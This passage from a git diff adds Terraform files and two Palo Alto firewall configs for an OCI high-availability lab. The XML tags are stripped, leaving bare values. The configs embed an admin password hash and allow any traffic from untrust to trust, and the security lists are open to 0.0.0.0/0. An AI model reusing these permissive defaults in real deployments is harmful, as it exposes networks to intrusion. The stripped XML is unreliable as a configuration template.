"${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} \ No newline at end of file diff --git a/oci/HA/fw-configs/HA-FWA.xml b/oci/HA/fw-configs/HA-FWA.xml new file mode 100644 index 00000000..ae6c5c2d --- /dev/null +++ b/oci/HA/fw-configs/HA-FWA.xml @@ -0,0 +1,623 @@ + + + + + + $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + no + + + + + + no + + + + + + + no + + + + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + 
+ + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 192.168.101.0/24 + + + + + + + + + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FWA + 192.168.0.11 + 255.255.255.0 + 192.168.0.1 + + + 169.254.169.254 + 8.8.8.8 + + + + + us.pool.ntp.org + + + + + + pool.ntp.org + + + + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + yes + no + no + no + + + + + yes + + + + + management + + + + ethernet1/3 + 192.168.30.101 + 255.255.255.0 + 192.168.30.1 + + + + 1 + 192.168.0.12 + + ip + + + 101 + + + + + + + auto + + + + yes + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + web1 + + + untrust + + + untrust + + + any + + + any + + any + any + + + + + + fw-untrust + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.101.2 + + + 192.168.1.100 + +
+
+
+
+
+
diff --git a/oci/HA/fw-configs/HA-FWB.xml b/oci/HA/fw-configs/HA-FWB.xml new file mode 100644 index 00000000..6b5d41ce --- /dev/null +++ b/oci/HA/fw-configs/HA-FWB.xml @@ -0,0 +1,623 @@ + + + + + + $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + no + + + + + + no + + + + + + + no + + + + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 192.168.101.0/24 + + + + + + + + + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FWB + 192.168.0.12 + 255.255.255.0 + 192.168.0.1 + + + 169.254.169.254 + 8.8.8.8 + + + + + us.pool.ntp.org + + + + + + pool.ntp.org + + + + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + yes + no + no + no + + + + + yes + + + + + management + + + + ethernet1/3 + 192.168.30.102 + 255.255.255.0 + 192.168.30.1 + + + + 1 + 192.168.0.11 + + ip + + + 102 + + + + + + + auto + + + + yes + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + web1 + + + untrust + + + untrust + + + any + + + any + + any + any + + + + + + fw-untrust + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.101.2 + + + 192.168.1.100 + +
+
+
+
+
+
diff --git a/oci/HA/identity_policy.tf b/oci/HA/identity_policy.tf new file mode 100644 index 00000000..c2d601b7 --- /dev/null +++ b/oci/HA/identity_policy.tf @@ -0,0 +1,14 @@ +resource "oci_identity_dynamic_group" "ha" { + compartment_id = "${var.tenancy_ocid}" + name = "HA" + description = "dynamic group created by terraform" + matching_rule = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}" +} +resource "oci_identity_policy" "ha" { + name = "HA" + description = "dynamic policy created by terraform" + compartment_id = "${oci_identity_compartment.compartment.id}" + statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}", + "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}", + ] +} \ No newline at end of file diff --git a/oci/HA/internet_gateway.tf b/oci/HA/internet_gateway.tf new file mode 100644 index 00000000..27439e7d --- /dev/null +++ b/oci/HA/internet_gateway.tf @@ -0,0 +1,6 @@ +resource "oci_core_internet_gateway" "internet_gateway" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "IG-PANW" + enabled = true +} \ No newline at end of file diff --git a/oci/HA/providers.tf b/oci/HA/providers.tf new file mode 100644 index 00000000..27515797 --- /dev/null +++ b/oci/HA/providers.tf @@ -0,0 +1,11 @@ +#terraform { +# required_version = ">= 0.12" +#} + +provider "oci" { + tenancy_ocid = "${var.tenancy_ocid}" + user_ocid = "${var.user_ocid}" + fingerprint = "${var.fingerprint}" + private_key_path = "${var.private_key_path}" + region = "${var.region}" +} \ No newline at end of file diff --git a/oci/HA/route_tables.tf b/oci/HA/route_tables.tf new file mode 100644 index 00000000..2e086160 --- /dev/null +++ b/oci/HA/route_tables.tf @@ -0,0 +1,24 @@ +resource "oci_core_route_table" "public" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "RT-Public" + + route_rules { + description = "default" + destination = "0.0.0.0/0" + destination_type = "CIDR_BLOCK" + network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}" + } +} +resource "oci_core_route_table" "web" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "RT-Web" + + route_rules { + description = "default" + destination = "0.0.0.0/0" + destination_type = "CIDR_BLOCK" + network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}" + } +} \ No newline at end of file diff --git a/oci/HA/secondary_ips.tf b/oci/HA/secondary_ips.tf new file mode 100644 index 00000000..289254e3 --- /dev/null +++ b/oci/HA/secondary_ips.tf @@ -0,0 +1,17 @@ +// The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover. 
+resource "oci_core_private_ip" "firewall_untrust_secondary_private" { + vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}" + display_name = "firewall_untrust_secondary_private" + ip_address = "${var.untrust_floating_ip}" +} +resource "oci_core_private_ip" "firewall_trust_secondary_private" { + vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}" + display_name = "firewall_trust_secondary_private" + ip_address = "${var.trust_floating_ip}" +} +resource "oci_core_public_ip" "firewall_untrust_secondary_public" { + compartment_id = "${oci_identity_compartment.compartment.id}" + lifetime = "RESERVED" + display_name = "firewall_untrust_secondary_public" + private_ip_id = "${oci_core_private_ip.firewall_untrust_secondary_private.id}" +} \ No newline at end of file diff --git a/oci/HA/security_lists.tf b/oci/HA/security_lists.tf new file mode 100644 index 00000000..bfa97d25 --- /dev/null +++ b/oci/HA/security_lists.tf @@ -0,0 +1,78 @@ +resource "oci_core_security_list" "management" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-mgmt" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "6" + source = "${var.fw_mgmt_src_ip}" + stateless = false + tcp_options { + min = 22 + max = 22 + } + } + ingress_security_rules { + protocol = "6" + source = "${var.fw_mgmt_src_ip}" + stateless = false + tcp_options { + min = 443 + max = 443 + } + } + ingress_security_rules { + protocol = "all" + source = "${var.management_cidr}" + stateless = false + } +} +resource "oci_core_security_list" "untrust" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-untrust" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" + source = "0.0.0.0/0" + stateless = false + } +} +resource "oci_core_security_list" "trust" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-trust" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" + source = "0.0.0.0/0" + stateless = false + } +} +resource "oci_core_security_list" "web" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-web" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" + source = "0.0.0.0/0" + stateless = false + } +} \ No newline at end of file diff --git a/oci/HA/server.tf b/oci/HA/server.tf new file mode 100644 index 00000000..9a64b4eb --- /dev/null +++ b/oci/HA/server.tf @@ -0,0 +1,26 @@ +resource "oci_core_instance" "web1" { + availability_domain = "${var.server_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "web1" + shape = "${var.server_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.web.id}" + display_name = "web1" + private_ip = "${var.web1_ip}" + assign_public_ip = false + } + + source_details { + source_type = "image" + source_id = "${var.ubuntu_image_ocid[var.region]}" + boot_volume_size_in_gbs = "60" + } + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" + #user_data = 
"${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} \ No newline at end of file diff --git a/oci/HA/terraform.tfvars b/oci/HA/terraform.tfvars new file mode 100644 index 00000000..61c5ee9f --- /dev/null +++ b/oci/HA/terraform.tfvars @@ -0,0 +1,32 @@ +tenancy_ocid = "